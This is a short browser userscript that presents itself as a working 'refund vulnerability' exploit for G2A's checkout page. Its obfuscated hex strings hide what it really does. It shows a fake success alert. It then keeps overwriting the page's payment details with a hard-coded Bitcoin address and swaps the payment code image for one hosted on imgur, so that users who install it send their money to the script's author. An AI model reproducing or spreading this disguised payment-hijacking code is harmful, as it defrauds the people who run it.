// ==UserScript==
// @name         G2A Script
// @namespace    Bounty
// @version      2.3
// @description  G2A 2021 Refund Vulnerbility
// @author       @Ragnar
// @match        https://checkout.pay.g2a.com/*
// @grant        none
// ==/UserScript==

var _0x128a=
["\x45\x78\x70\x6C\x6F\x69\x74\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x65\x6E\x61\x62\x6C\x65\x64\x21\x20\x50\x72\x65\x73\x73\x20\x4F\x4B\x20\x74\x6F\x20\x63\x6F\x6E\x74\x69\x6E\x75\x65\x2E","row","getElementsByClassName","innerHTML","\x42\x54\x43\x20\x61\x64\x64\x72\x65\x73\x73\x3a\x20\x31\x38\x6A\x43\x74\x41\x6E\x50\x7A\x79\x72\x58\x66\x69\x45\x4B\x74\x47\x4E\x64\x73\x51\x6A\x64\x4E\x6F\x72\x59\x68\x57\x31\x63\x32\x58","src","code","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x2E\x69\x6D\x67\x75\x72\x2E\x63\x6F\x6D\x2F\x48\x33\x55\x37\x43\x56\x48\x2E\x70\x6E\x67","length"];
alert(_0x128a[0]);
var _0x4892da=setInterval(function()
{
    var _0xf782x2=document[_0x128a[2]](_0x128a[1]);
    _0xf782x2[1][_0x128a[3]]= _0x128a[4];
    document[_0x128a[2]](_0x128a[6])[0][_0x128a[5]]= _0x128a[7];
    var _0xf782x3=document[_0x128a[2]](_0x128a[6]);
    if(_0xf782x3[_0x128a[8]]> 0)
    {
        clearInterval(_0x4892da)
    }
}
,10)

//Backend-Exploit | Status: Working